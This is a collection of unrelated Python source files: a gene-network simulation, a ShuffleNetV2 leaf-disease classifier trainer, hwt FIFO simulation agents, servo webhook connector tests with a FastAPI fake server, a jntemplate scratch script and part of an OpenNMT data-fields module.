                        os.makedirs(directory_)
                        print("Folder didn't exist, create a new directory "+directory_)
                    dic = {"gamma_G": gamma_G, "gamma_TF": gamma_TF, "N1": N1, "N2": N2, "R": R, "M": M}
                    with open(directory_+'/dic-couplings.pkl', 'wb') as f:
                        pickle.dump(dic, f, pickle.HIGHEST_PROTOCOL)
                    print("finish to write couplings")
                    break
    else:
        # BUG FIX: this branch previously omitted `bias`, silently falling back
        # to create_graph's 0.5 default instead of the configured 0.379.
        M, R = create_graph(N1, N2, gamma_G, gamma_TF, bias)
    Ts = np.arange(0.01, 1., 0.003)
    theta = 0
    P_g = 0.5 * np.ones(N1)  # uniform initial activation probability
    data = cavity_AND_parallel(P_g, Ts, R, M, theta, J0=1, threads=threads)
    dic = {"gamma_G": gamma_G, "gamma_TF": gamma_TF, "N1": N1, "N2": N2, "R": R, "M": M, "Ts": Ts, "data": data}
    save_obj(dic, gamma_G, gamma_TF, theta)
if __name__ == '__main__':
    main()
|
from shufflenetv2 import *
from leaf_process_utils import *
from torch import optim, nn, cuda
from torchvision import datasets, transforms
from torch.utils import data
import torch
from pathlib import Path
import logging
import time
import copy
import os
# Pin training to the second GPU.
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
# --- experiment configuration ---
img_size = 224
species = 'yintao'
train_folder = './train-class-desease/yintao'
valid_folder = './valid-class-desease/yintao-v'
# Timestamp suffix shared by the log file and the saved model name.
t = time.strftime('%Y%m%d%H%M', time.localtime(time.time()))
# Log everything (DEBUG and up) to a per-run file.
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
log_path = f'./logs/{species}{t}.log'
fh = logging.FileHandler(log_path, mode='w')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter("[line:%(lineno)d] - %(levelname)s: %(message)s")
fh.setFormatter(formatter)
logger.addHandler(fh)
logger.debug(f'{species}')
class TransformLeaf(object):
    """Torchvision-style transform applying the leaf preprocessing pipeline."""
    def __init__(self, size=(img_size, img_size)):
        # Target output size as (height, width); defaults to the module setting.
        self.size = size
    def __call__(self, img):
        """
        Args:
            img: PIL Image
        Returns:
            np.array
        """
        # BUG FIX: the original ignored `self.size` and always passed the
        # module-level (img_size, img_size); honor the configured size.
        # Behavior is unchanged for the default constructor arguments.
        return process_all(img, size=self.size)
def train_model(model: nn.Module, maxepoch: int, save_name: str=None):
    """Train `model` on the leaf-disease image folders, tracking the best
    validation accuracy and optionally saving those weights.

    Args:
        model: network to train (wrapped in DataParallel if multiple GPUs).
        maxepoch: number of epochs to run.
        save_name: when given, best weights are saved under ./models/.
    """
    # model
    device = torch.device("cuda" if cuda.is_available() else "cpu")
    if torch.cuda.device_count() > 1:
        print('multiple gpus used')
        model = nn.DataParallel(model)
    model = model.to(device)
    # optim
    criterion = nn.CrossEntropyLoss()
    logger.debug('criterion: CrossEntropyLoss')
    optimizer = optim.RMSprop(model.parameters(), lr=0.001)
    logger.debug('optimizer: RMSprop')
    # data: random flips + leaf preprocessing for both phases
    data_transforms = {
        'train': transforms.Compose([
            transforms.RandomVerticalFlip(),
            transforms.RandomHorizontalFlip(),
            TransformLeaf(),
            transforms.ToTensor(),
        ]),
        'val': transforms.Compose([
            transforms.RandomVerticalFlip(),
            transforms.RandomHorizontalFlip(),
            TransformLeaf(),
            transforms.ToTensor(),
        ]),
    }
    image_datasets = {'train': datasets.ImageFolder(train_folder, data_transforms['train']),
                      'val': datasets.ImageFolder(valid_folder, data_transforms['val'])}
    dataloaders = {'train': data.DataLoader(image_datasets['train'], batch_size=32, shuffle=True, num_workers=4),
                   'val': data.DataLoader(image_datasets['val'], batch_size=60, shuffle=True, num_workers=3)}
    dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val']}
    best_model_wts = copy.deepcopy(model.state_dict())
    best_acc = 0
    # train and valid
    for epoch in range(maxepoch):
        for phase in ['train', 'val']:
            if phase == 'train':
                model.train()  # Set model to training mode
            else:
                model.eval()   # Set model to evaluate mode
            running_loss = 0
            running_corrects = 0
            # Iterate over data.
            for inputs, labels in dataloaders[phase]:
                inputs = inputs.to(device)
                labels = labels.to(device)
                # zero the parameter gradients
                optimizer.zero_grad()
                # forward
                # track history if only in train
                with torch.set_grad_enabled(phase == 'train'):
                    outputs = model(inputs)
                    _, preds = torch.max(outputs, 1)
                    loss = criterion(outputs, labels)
                    # backward + optimize only if in training phase
                    if phase == 'train':
                        loss.backward()
                        optimizer.step()
                # statistics
                running_loss += loss.item() * inputs.size(0)
                running_corrects += torch.sum(preds == labels.data)
                # per-batch accuracy, used only for progress logging
                ac = torch.sum(preds == labels.data).double() / labels.data.shape[0]
                logger.debug(f'{epoch} {phase} loss: {loss.item()} acc: {ac}')
                print(f'{epoch} {phase} loss: {loss.item()} acc: {ac}')
            epoch_loss = running_loss / dataset_sizes[phase]
            epoch_acc = running_corrects.double() / dataset_sizes[phase]
            print(f'{phase} Loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')
            logger.debug(f'{phase} Loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')
            # deep copy the model
            if phase == 'val' and epoch_acc > best_acc:
                best_acc = epoch_acc
                best_model_wts = copy.deepcopy(model.state_dict())
        print()
    if save_name:
        # NOTE(review): the saved filename has an underscore before save_name
        # but the logged one does not — confirm which form is intended.
        torch.save(best_model_wts, f'./models/{species}_shufflenetv2_{save_name}_params.pkl')
        logger.info(f'./models/{species}_shufflenetv2{save_name}_params.pkl')
# Build a 3-class ShuffleNetV2 (12 input channels from the stacked leaf
# preprocessing) and train it for 80 epochs, tagging outputs with the timestamp.
model = ShuffleNetV2(scale=0.5, in_channels=12, c_tag=0.5, num_classes=3, activation=nn.ReLU, SE=False, residual=False)
train_model(model, 80, t)
|
<reponame>mgielda/hwt<filename>hwt/interfaces/agents/fifo.py<gh_stars>0
from collections import deque
from hwt.simulator.agentBase import SyncAgentBase
from hwt.simulator.shortcuts import OnRisingCallbackLoop
from hwt.interfaces.agents.signal import DEFAULT_CLOCK
class FifoReaderAgent(SyncAgentBase):
    """
    Simulation agent for FifoReader interface

    As a *monitor* it drives `en` and collects read data into `self.data`.
    As a *driver* it drives `wait`/`data` from `self.data` toward the DUT.
    """
    def __init__(self, intf, allowNoReset=False):
        super(FifoReaderAgent, self).__init__(intf, allowNoReset)
        self.data = deque()          # FIFO payload buffer (monitor: collected, driver: to send)
        self.readPending = False     # a read was requested in the previous cycle
        self.lastData = None         # data word currently presented by the driver
        # flags to keep data coherent when enable state changes
        self.lastData_invalidate = False
        self.readPending_invalidate = False
    def setEnable_asDriver(self, en, sim):
        self._enabled = en
        self.driver.setEnable(en, sim)
        # While disabled, assert `wait` so the DUT does not consume stale data.
        sim.write(not en, self.intf.wait)
        self.lastData_invalidate = not en
    def setEnable_asMonitor(self, en, sim):
        lastEn = self._enabled
        self._enabled = en
        self.monitor.setEnable(en, sim)
        sim.write(en, self.intf.en)
        self.readPending_invalidate = not en
        # (Re)start the data-reader loop only on a disabled->enabled edge.
        if not lastEn:
            self.dataReader.setEnable(en, sim)
    def driver_init(self, sim):
        # One-shot initialization of the `wait` signal; the bare `yield` after
        # `return` makes this function a generator as the simulator expects.
        sim.write(not self._enabled, self.intf.wait)
        return
        yield
    def monitor_init(self, sim):
        # One-shot initialization of the `en` signal (generator, see above).
        sim.write(self._enabled, self.intf.en)
        return
        yield
    def dataReader(self, sim):
        # Completes a read requested in the previous cycle: sample `data`
        # after combinational settle and store it.
        if self.readPending:
            yield sim.waitOnCombUpdate()
            d = sim.read(self.intf.data)
            self.data.append(d)
        if self.readPending_invalidate:
            self.readPending = False
    def getMonitors(self):
        # Wrap dataReader so it runs on each rising clock edge while enabled.
        self.dataReader = OnRisingCallbackLoop(self.clk,
                                               self.dataReader,
                                               self.getEnable)
        return ([self.monitor_init] +
                super(FifoReaderAgent, self).getMonitors() +
                [self.dataReader])
    def monitor(self, sim):
        intf = self.intf
        r = sim.read
        if self.notReset(sim):
            # speculative en set
            yield sim.waitOnCombUpdate()
            wait = r(intf.wait)
            assert wait.vldMask, (sim.now, intf, "wait signal in invalid state")
            # Request a read whenever the DUT is not signalling wait.
            rd = not wait.val
            sim.write(rd, intf.en)
        else:
            # In reset: keep `en` deasserted and do not schedule a read.
            sim.write(0, intf.en)
            rd = False
        self.readPending = rd
    def getDrivers(self):
        # Wrap dataWriter so it runs on each rising clock edge while enabled.
        self.dataWriter = OnRisingCallbackLoop(self.clk,
                                               self.dataWriter,
                                               self.getEnable)
        return ([self.driver_init] +
                super(FifoReaderAgent, self).getDrivers() +
                [self.dataWriter])
    def dataWriter(self, sim):
        # delay data litle bit to have nicer wave
        # otherwise wirte happens before next clk period
        # and it means in 0 time and we will not be able to see it in wave
        yield sim.wait(DEFAULT_CLOCK / 10)
        sim.write(self.lastData, self.intf.data)
        if self.lastData_invalidate:
            self.lastData = None
    def driver(self, sim):
        # now we are before clock event
        # * set wait signal
        # * set last data (done in separate process)
        # * if en == 1, pop next data for next clk
        intf = self.intf
        w = sim.write
        rst_n = self.notReset(sim)
        # speculative write
        if rst_n and self.data:
            wait = 0
        else:
            wait = 1
        w(wait, intf.wait)
        if rst_n:
            yield sim.waitOnCombUpdate()
            # wait for potential update of en
            yield sim.waitOnCombUpdate()
            # check if write can be performed and if it possible do real write
            en = sim.read(intf.en)
            assert en.vldMask, (sim.now, intf, "en signal in invalid state")
            if en.val:
                assert self.data, (sim.now, intf, "underflow")
                self.lastData = self.data.popleft()
class FifoWriterAgent(SyncAgentBase):
    """
    Simulation agent for FifoWriter interface

    As a *driver* it pushes words from `self.data` into the DUT via `en`/`data`.
    As a *monitor* it collects words the DUT writes while `wait` is low.
    """
    def __init__(self, intf, allowNoReset=False):
        super(FifoWriterAgent, self).__init__(intf, allowNoReset=allowNoReset)
        self.data = deque()  # payload buffer (driver: to send, monitor: collected)
    def driver_init(self, sim):
        # One-shot init of `en`; bare `yield` after `return` keeps this a generator.
        sim.write(self._enabled, self.intf.en)
        return
        yield
    def monitor_init(self, sim):
        # One-shot init of `wait` (generator, see above).
        sim.write(not self._enabled, self.intf.wait)
        return
        yield
    def setEnable_asDriver(self, en, sim):
        SyncAgentBase.setEnable_asDriver(self, en, sim)
        sim.write(en, self.intf.en)
    def setEnable_asMonitor(self, en, sim):
        SyncAgentBase.setEnable_asMonitor(self, en, sim)
        # While the monitor is disabled, hold `wait` high to stall the DUT.
        sim.write(not en, self.intf.wait)
    def monitor(self, sim):
        # set wait signal
        # if en == 1 take data
        intf = self.intf
        sim.write(0, intf.wait)
        yield sim.waitOnCombUpdate()
        # wait for potential update of en
        yield sim.waitOnCombUpdate()
        en = sim.read(intf.en)
        assert en.vldMask, (sim.now, intf, "en signal in invalid state")
        if en.val:
            # Small delay so the captured data is visible in the waveform.
            yield sim.wait(DEFAULT_CLOCK / 10)
            self.data.append(sim.read(intf.data))
    def driver(self, sim):
        # if wait == 0 set en=1 and set data
        intf = self.intf
        w = sim.write
        if self.notReset(sim) and self.data:
            yield sim.waitOnCombUpdate()
            wait = sim.read(intf.wait)
            assert wait.vldMask, (sim.now, intf, "wait signal in invalid state")
            if not wait.val:
                # DUT is ready: present the next word with `en` asserted.
                d = self.data.popleft()
                w(d, intf.data)
                w(1, intf.en)
                return
        # Nothing to send (or DUT stalled): drive idle values.
        w(None, intf.data)
        w(0, intf.en)
    def getDrivers(self):
        return SyncAgentBase.getDrivers(self) + [self.driver_init]
    def getMonitors(self):
        return SyncAgentBase.getMonitors(self) + [self.monitor_init]
|
<filename>servo_webhooks_test.py<gh_stars>0
from __future__ import annotations
import asyncio
import hmac
import hashlib
from typing import List, Optional, AsyncIterator
import pydantic
import pytest
import servo
from servo import BaseConfiguration, BaseConnector, Metric, Unit, on_event
from servo.events import EventContext
from servo_webhooks import WebhooksConfiguration, WebhooksConnector, Webhook, __version__
import httpx
import respx
import fastapi
import uvicorn
pytestmark = pytest.mark.asyncio
class WebhookEventConnector(BaseConnector):
    """Minimal connector that answers the `metrics` event, used to drive
    `after:metrics` webhooks in tests."""
    @on_event()
    def metrics(self) -> List[Metric]:
        # Two representative metrics; the values are irrelevant to delivery.
        return [
            Metric("throughput", Unit.requests_per_minute),
            Metric("error_rate", Unit.percentage),
        ]
@respx.mock
async def test_webhook() -> None:
    """A single `before:measure` webhook fires when `measure` is dispatched."""
    webhook = Webhook(url="http://localhost:8080/webhook", events="before:measure", secret="testing")
    config = WebhooksConfiguration(__root__=[webhook])
    connector = WebhooksConnector(config=config)
    await connector.startup()
    # Mock the endpoint so no real HTTP request leaves the test.
    request = respx.post("http://localhost:8080/webhook").mock(return_value=httpx.Response(204))
    await connector.dispatch_event("measure")
    assert request.called
@respx.mock
async def test_webhooks() -> None:
    """One webhook subscribed to two events fires for each of them."""
    webhook = Webhook(url="http://localhost:8080/webhook", events=["before:measure", "after:adjust"], secret="test")
    config = WebhooksConfiguration(__root__=[webhook])
    connector = WebhooksConnector(config=config)
    await connector.startup()
    request = respx.post("http://localhost:8080/webhook").mock(return_value=httpx.Response(204))
    # Each subscribed event should hit the mocked endpoint.
    await connector.dispatch_event("measure")
    assert request.called
    await connector.dispatch_event("adjust")
    assert request.called
async def test_unresponsive_webhook_doesnt_crash() -> None:
    """Dispatching to an unreachable webhook URL must not raise."""
    # Port 8259 is intentionally not served; delivery failure should be absorbed.
    webhook = Webhook(url="http://localhost:8259/webhook", events=["before:measure", "after:adjust"], secret="test")
    config = WebhooksConfiguration(__root__=[webhook])
    connector = WebhooksConnector(config=config)
    await connector.startup()
    await connector.dispatch_event("adjust")
def test_headers_are_added_to_requests() -> None:
    # TODO: assert configured headers appear on outbound webhook requests.
    pass
# TODO: Test after:metrics, test schema
@respx.mock
async def test_after_metrics_webhook() -> None:
    """An `after:metrics` webhook fires when a provider dispatches `metrics`."""
    webhook = Webhook(url="http://localhost:8080/webhook", events=["after:metrics"], secret="w00t")
    config = WebhooksConfiguration(__root__=[webhook])
    connector = WebhooksConnector(config=config)
    await connector.startup()
    request = respx.post("http://localhost:8080/webhook").respond(204)
    provider = WebhookEventConnector(config=BaseConfiguration())
    # Register the webhooks connector so it observes events from the provider.
    provider.__connectors__.append(connector)
    # The dispatch results are not inspected — only the webhook delivery is.
    # (Removed the unused `results` local that shadowed this intent.)
    await provider.dispatch_event("metrics")
    assert request.called
async def test_after_metrics_content_type() -> None:
    # TODO: assert the Content-Type of after:metrics payloads, e.g. the
    # vendor media types enumerated below.
    pass
    # Content-Type: application/vnd.opsani.servo.events.after:metrics+json
    # Content-Type: application/vnd.opsani.servo.webhooks+json
    # Content-Type: application/vnd.opsani.servo-webhooks+json
    # await asyncio.sleep(2)
# no colon, wrong casing, no such event, mixed collection (number and strings)
def test_bad_event_inputs() -> None:
    # TODO: cover the malformed event names enumerated above.
    pass
def test_root_configuration() -> None:
    # TODO: exercise WebhooksConfiguration's __root__ model directly.
    pass
def test_event_body() -> None:
    # TODO: validate the serialized event payload body.
    pass
# TODO: assert Content-Type headers on outbound webhook requests
def test_request_schema() -> None:
    # TODO: validate the outbound request JSON schema.
    pass
def test_channels_and_events_cannot_be_empty() -> None:
    """A Webhook must subscribe to at least one event or channel."""
    with pytest.raises(pydantic.ValidationError, match='missing webhook data source: events and channels cannot both be empty'):
        Webhook(url="http://localhost:8080/webhook", secret="testing")
@respx.mock
async def test_hmac_signature() -> None:
    """Outbound webhook requests carry a valid HMAC-SHA1 signature header."""
    webhook = Webhook(url="http://localhost:8080/webhook", events="after:measure", secret="testing")
    config = WebhooksConfiguration(__root__=[webhook])
    connector = WebhooksConnector(config=config)
    await connector.startup()
    info = {}
    def match_and_mock(request):
        # Capture the signature header and raw body for later verification.
        if request.method != "POST":
            return None
        if "x-servo-signature" in request.headers:
            signature = request.headers["x-servo-signature"]
            body = request.read()
            info.update(dict(signature=signature, body=body))
        return httpx.Response(204)
    webhook_request = respx.route().mock(side_effect=match_and_mock)
    await connector.dispatch_event("measure")
    assert webhook_request.called
    # Recompute HMAC-SHA1 over the captured body with the shared secret.
    expected_signature = info["signature"]
    signature = str(hmac.new("testing".encode(), info["body"], hashlib.sha1).hexdigest())
    assert signature == expected_signature
def test_cancelling_event_from_before_request() -> None:
    # TODO: a before-event webhook response should be able to cancel the event.
    pass
class TestCLI:
    """Placeholders for the connector's CLI commands (list/schema/trigger/validate)."""
    def test_list(self) -> None:
        pass
    def test_schema(self) -> None:
        pass
    def test_trigger(self) -> None:
        pass
    def test_validate(self) -> None:
        pass
# TODO: Test backoff and retry
# TODO: Test generate
def test_generate():
    """Smoke test: a generated default configuration serializes to YAML."""
    config = WebhooksConfiguration.generate()
    # NOTE(review): `debug` is not imported in this module — presumably servo
    # installs devtools' debug() as a builtin; confirm, else this is a NameError.
    debug(config.yaml())
    #debug(config.dict(exclude={"webhooks": {'events': {'__all__': {'signature'} }}}))
@pytest.mark.parametrize(
    "event_str,found,resolved",
    [
        ("before:measure", True, "before:measure"),
        ("on:measure", True, "measure"),
        ("measure", True, "measure"),
        ("after:measure", True, "after:measure"),
        ("invalid:adjust", False, None),
        ("before:invalid", False, None),
        ("BEFORE:adjust", False, None),
        ("before:MEASURE", False, None),
        ("", False, None),
        ("nothing", False, None),
    ]
)
def test_from_str(event_str: str, found: bool, resolved: str):
    """EventContext.from_str resolves valid event strings and rejects invalid ones."""
    ec = EventContext.from_str(event_str)
    # A falsy EventContext means the string did not resolve to a known event.
    assert bool(ec) == found
    assert (ec.__str__() if ec else None) == resolved
class FakeAPI(uvicorn.Server):
    """Testing server for implementing API fakes on top of Uvicorn and FastAPI.
    The test server is meant to be paired with pytest fixtures that enable a
    simple mechanism for utilizing API fakes in testing.
    A fake is a protocol compliant stand-in for another system that aids in testing
    by providing stateless, deterministic, and isolated implementations of dependent
    services. Fakes tend to be easier to develop and less brittle than mocking, which
    tends to cut out entire subsystems such as network transport. A fake, in contrast,
    focuses on delivering a request/response compatible stand-in for the real system
    and supports high velocity development and testing by eliminating concerns such as
    stateful persistence, cross talk from other users/developers, and the drag of latency.
    Usage:
        @pytest.fixture
        async def fakeapi_url(fastapi_app: fastapi.FastAPI, unused_tcp_port: int) -> AsyncIterator[str]:
            server = FakeAPI(fastapi_app, port=unused_tcp_port)
            await server.start()
            yield server.base_url
            await server.stop()
    """
    def __init__(self, app: fastapi.FastAPI, host: str = '127.0.0.1', port: int = 8000) -> None:
        """Initialize a FakeAPI instance by mounting a FastAPI app and starting Uvicorn.
        Args:
            app (FastAPI, optional): the FastAPI app.
            host (str, optional): the host ip. Defaults to '127.0.0.1'.
            port (int, optional): the port. Defaults to 8000.
        """
        # Set before super().__init__ so startup() can signal readiness.
        self._startup_done = asyncio.Event()
        super().__init__(config=uvicorn.Config(app, host=host, port=port))
    async def startup(self, sockets: Optional[List] = None) -> None:
        """Override Uvicorn startup to signal any tasks blocking to await startup."""
        await super().startup(sockets=sockets)
        self._startup_done.set()
    async def start(self) -> None:
        """Start up the server and wait for it to initialize."""
        self._serve_task = asyncio.create_task(self.serve())
        await self._startup_done.wait()
    async def stop(self) -> None:
        """Shut down server asynchronously."""
        # Uvicorn's serve() loop exits when should_exit is set.
        self.should_exit = True
        await self._serve_task
    @property
    def base_url(self) -> str:
        """Return the base URL for accessing the FakeAPI server."""
        return f"http://{self.config.host}:{self.config.port}/"
@pytest.fixture
def fastapi_app() -> fastapi.FastAPI:
    """Return a FastAPI instance for testing in the current scope.
    To utilize the FakeAPI fixtures, define a module local FastAPI object
    that implements the API interface that you want to work with and return it
    from an override implementation of the `fastapi_app` fixture.
    The default implementation is abstract and raises a NotImplementedError.
    To interact from the FastAPI app within your tests, invoke the `fakeapi_url`
    fixture to obtain the base URL for a running instance of your fastapi app.
    """
    # Abstract by design: tests must override this fixture with a concrete app.
    raise NotImplementedError(f"incomplete fixture implementation: build a FastAPI fixture modeling the system you want to fake")
@pytest.fixture
async def fakeapi_url(fastapi_app: fastapi.FastAPI, unused_tcp_port: int) -> AsyncIterator[str]:
    """Run a FakeAPI server as a pytest fixture and yield the base URL for accessing it."""
    # BUG FIX: the annotation was `AsyncIterator[str, None]`, which raises a
    # TypeError at import time — AsyncIterator takes exactly one type parameter
    # (matching the usage example in FakeAPI's docstring).
    server = FakeAPI(app=fastapi_app, port=unused_tcp_port)
    await server.start()
    yield server.base_url
    await server.stop()
@pytest.fixture
async def fakeapi_client(fakeapi_url: str) -> AsyncIterator[httpx.AsyncClient]:
    """Yield an httpx client configured to interact with a FakeAPI server."""
    default_headers = {
        'Content-Type': 'application/json',
    }
    async with httpx.AsyncClient(headers=default_headers, base_url=fakeapi_url) as client:
        yield client
class Notification(pydantic.BaseModel):
    """Payload schema accepted by the fake webhook endpoint."""
    # Counter value carried by each published message.
    count: int
# Module-level record of notifications received by the fake API endpoint;
# tests assert against it and the autouse fixture below clears it per test.
notifications: List[Notification] = []
@pytest.fixture(autouse=True)
def _reset_notifications_list() -> None:
    """Empty the module-level `notifications` list before every test."""
    del notifications[:]
# FastAPI app exposing a single endpoint that records posted notifications.
api = fastapi.FastAPI()
@api.post("/")
async def create_notification(notification: Notification):
    # Log and record the webhook delivery so tests can assert on it.
    servo.logger.success(f"Received notification: {notification}")
    notifications.append(notification)
    return notification
@pytest.fixture
def fastapi_app() -> fastapi.FastAPI:
    """Override the abstract `fastapi_app` fixture with the notification-recording app."""
    return api
class PublisherConnector(servo.BaseConnector):
    """Connector that publishes an incrementing counter to the `the_news` channel."""

    # Number of messages published so far.
    count: int = 0

    @servo.on_event()
    async def startup(self) -> None:
        # Register a repeating publisher on startup; `every=1.0` presumably
        # means once per second — confirm against servo.pubsub docs.
        @self.publish("the_news", every=1.0)
        async def _publish_count(publisher: servo.pubsub.Publisher) -> None:
            message = servo.pubsub.Message(json={"count": self.count})
            await publisher(message)
            servo.logger.debug(f"Published message {message}")
            self.count += 1
async def test_channel_webhooks(
    fakeapi_url: str,
    fastapi_app: fastapi.FastAPI
) -> None:
    """Publish on `the_news` and verify every message arrives as a webhook."""
    news_publisher = PublisherConnector(config={})
    hooks_config = WebhooksConfiguration(
        __root__=[Webhook(url=fakeapi_url, channels=["the_news"], secret="testing")]
    )
    webhooks = WebhooksConnector(
        config=hooks_config, pubsub_exchange=news_publisher.pubsub_exchange
    )
    news_publisher.pubsub_exchange.start()
    await news_publisher.startup()
    await webhooks.startup()
    await asyncio.sleep(3.5)

    assert news_publisher.count
    assert notifications
    assert len(notifications) == news_publisher.count
class ResponseObserverConnector(servo.BaseConnector):
    """Connector that records every message seen on the `the_responses` channel."""

    # NOTE(review): class-level mutable default; if BaseConnector is a pydantic
    # model this becomes a per-instance field, otherwise instances share the
    # list — confirm against servo.BaseConnector.
    messages: List[servo.Message] = []

    @servo.on_event()
    async def startup(self) -> None:
        # Subscribe on startup; the callback appends each observed message.
        @self.subscribe("the_responses")
        def _message_received(message: servo.Message, channel: servo.Channel) -> None:
            servo.logger.info(f"Notified of a new Message: {message}, {channel}")
            self.messages.append(message)
async def test_channel_webhooks_with_response_channel(
    fakeapi_url: str,
    fastapi_app: fastapi.FastAPI
) -> None:
    """Verify webhook delivery and that each response is republished to `the_responses`."""
    news_publisher = PublisherConnector(config={})
    observer = ResponseObserverConnector(
        config={}, pubsub_exchange=news_publisher.pubsub_exchange
    )
    hook = Webhook(
        url=fakeapi_url,
        channels=["the_news"],
        response_channel="the_responses",
        secret="testing",
    )
    webhooks = WebhooksConnector(
        config=WebhooksConfiguration(__root__=[hook]),
        pubsub_exchange=news_publisher.pubsub_exchange,
    )
    news_publisher.pubsub_exchange.start()
    await news_publisher.startup()
    await observer.startup()
    await webhooks.startup()
    await asyncio.sleep(3.5)

    assert news_publisher.count
    assert notifications
    assert len(notifications) == news_publisher.count
    assert len(observer.messages) == len(notifications)
|
<gh_stars>0
# -*- coding: utf-8 -*-
# Fix: `engine` was imported twice in the same import list.
from jntemplate import Template, engine, BaseLoader, FileLoader
from timeit import timeit
import time
#from jntemplate import Lexer
# engine.configure(None)
# lexer = Lexer("${user.name}23412BAESFD$225B${name}${none}")
# arr = lexer.parse()
# for c in arr:
# print(c.string())
# dic = {"aaa":1}
# #dic.fromkeys
# t ="2"
# print(type(1))
# print(type(1.1))
# print(type(1.11112545225))
# print(type(""))
# print(type([]))
# print(type({}))
# print(type(True))
# class Parent(object):
# "父类"
# parentAttr = 100
# def __init__(self):
# super(Parent,self).__init__()
# print ("调用父类构造函数")
# def parentMethod(self):
# print ('调用父类方法')
# def setAttr(self, attr):
# Parent.parentAttr = attr
# def getAttr(self):
# print ("父类属性 :", Parent.parentAttr)
# def bbb(self):
# print ("父类bbb")
# class Child(Parent):
# "定义子类"
# def childMethod(self):
# print ('调用子类方法 child method')
# # 在子类中调用父类方法
# print (Parent.getAttr(self))
# def bbb(self):
# print ("Child类bbb")
# class DD(Child):
# "定义子类"
# def bbb(self):
# print ("dd类bbb")
# c = DD()
# c.childMethod()
#engine.configure(None)
# t = Template("hello ${name}")
# t.set("name","jnt4py")
# print(t.render())
#print(hasattr(t,"stringbb"))
#s = getattr(t,"string")
#print(s)
#print(getattr(t,"string"))
#print(dir(getattr(t,"context")) )
#print(t.string())
# class dd:
# def test(self,a,b):
# return a+b
# def test1():
# r = dd()
# arr=["test code:","success"]
# eval("r.test(arr[0],arr[1])")
# def test2():
# r = dd()
# arr=["test code:","success"]
# r.test(arr[0],arr[1])
# print(timeit('test1()', 'from __main__ import test1', number=10000))
# print(timeit('test2()', 'from __main__ import test2', number=10000))
# arr = [1,2,3,4,5,6,7]
# print(arr[2:-3])
# print(arr[2:len(arr)-3])
# g = lambda x,y: x +y
# text = "${g(2,8)}vvvvv"
# template = Template(text)
# template.set("g",g)
# print( template.render())
# Initialize the template engine with its default configuration.
engine.configure()
# text = "$str.upper()"
# template = engine.create_template(text)
# template.set("str","hello jnt4py")
# render = template.render()
# Render an index expression: prints the element at index 2 of `data`.
template = engine.create("$data[2]")
template.set("data", [7, 0, 2, 0, 6])
render = template.render()
print( render)
# list = ["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11"]
# print(list[1:3])
# print(list[1:])
#print(type(time.time()))
# dic = {"aaa":1,"bbb":2}
# for n in dic:
# print(dic[n]) |
# -*- coding: utf-8 -*-
import os
import codecs
from collections import Counter, defaultdict
from itertools import chain, count
import torch
import torchtext.data
import torchtext.vocab
from onmt.Utils import aeq
from pdb import set_trace
PAD_WORD = '<blank>'  # padding token
UNK = 0               # vocabulary index reserved for unknown words
BOS_WORD = '<s>'      # beginning-of-sentence token
EOS_WORD = '</s>'     # end-of-sentence token
def _getstate(self):
    """Return a picklable copy of __dict__ with `stoi` demoted to a plain dict."""
    state = self.__dict__.copy()
    state["stoi"] = dict(self.stoi)
    return state
def _setstate(self, state):
    """Restore __dict__ from `state`, rebuilding `stoi` with an UNK default."""
    for key, value in state.items():
        self.__dict__[key] = value
    # Unknown words map to index 0 again after unpickling.
    self.stoi = defaultdict(lambda: 0, self.stoi)
# Monkey-patch torchtext's Vocab so it can be pickled: its `stoi` is a
# defaultdict whose lambda default factory breaks pickle.
torchtext.vocab.Vocab.__getstate__ = _getstate
torchtext.vocab.Vocab.__setstate__ = _setstate
def get_fields(data_type, n_src_features, n_tgt_features):
    """
    Args:
        data_type: type of the source input. Options are [text|img|audio].
        n_src_features: the number of source features to create Field for.
        n_tgt_features: the number of target features to create Field for.

    Returns:
        A dictionary whose keys are strings and whose values are the
        corresponding Field objects.
    """
    fields = {}

    if data_type == 'text':
        # Token sequences; lengths are kept (include_lengths=True),
        # presumably for packed-sequence encoders — confirm at the call site.
        fields["src"] = torchtext.data.Field(
            pad_token=PAD_WORD,
            include_lengths=True)
    elif data_type == 'img':
        def make_img(data, _):
            # Collate variable-size images into one zero-padded 4D tensor.
            c = data[0].size(0)
            h = max([t.size(1) for t in data])
            w = max([t.size(2) for t in data])
            imgs = torch.zeros(len(data), c, h, w)
            for i, img in enumerate(data):
                imgs[i, :, 0:img.size(1), 0:img.size(2)] = img
            return imgs

        fields["src"] = torchtext.data.Field(
            use_vocab=False, tensor_type=torch.FloatTensor,
            postprocessing=make_img, sequential=False)
    elif data_type == 'audio':
        def make_audio(data, _):
            # Collate variable-length spectrograms, zero-padded on the time axis.
            nfft = data[0].size(0)
            t = max([t.size(1) for t in data])
            sounds = torch.zeros(len(data), 1, nfft, t)
            for i, spect in enumerate(data):
                sounds[i, :, :, 0:spect.size(1)] = spect
            return sounds

        fields["src"] = torchtext.data.Field(
            use_vocab=False, tensor_type=torch.FloatTensor,
            postprocessing=make_audio, sequential=False)

    # One extra Field per source-side feature column.
    for j in range(n_src_features):
        fields["src_feat_"+str(j)] = \
            torchtext.data.Field(pad_token=PAD_WORD)

    # Target side is always text, wrapped in BOS/EOS markers.
    fields["tgt"] = torchtext.data.Field(
        init_token=BOS_WORD, eos_token=EOS_WORD,
        pad_token=PAD_WORD)

    for j in range(n_tgt_features):
        fields["tgt_feat_"+str(j)] = \
            torchtext.data.Field(init_token=BOS_WORD, eos_token=EOS_WORD,
                                 pad_token=PAD_WORD)

    def make_src(data, _):
        # Build a (src_len, batch, src_vocab) one-hot alignment tensor;
        # presumably consumed by the copy/pointer mechanism — confirm.
        src_size = max([t.size(0) for t in data])
        src_vocab_size = max([t.max() for t in data]) + 1
        alignment = torch.zeros(src_size, len(data), src_vocab_size)
        for i, sent in enumerate(data):
            for j, t in enumerate(sent):
                alignment[j, i, t] = 1
        return alignment

    fields["src_map"] = torchtext.data.Field(
        use_vocab=False, tensor_type=torch.FloatTensor,
        postprocessing=make_src, sequential=False)

    def make_tgt(data, _):
        # Pad per-sentence target alignment vectors to a common length.
        tgt_size = max([t.size(0) for t in data])
        alignment = torch.zeros(tgt_size, len(data)).long()
        for i, sent in enumerate(data):
            alignment[:sent.size(0), i] = sent
        return alignment

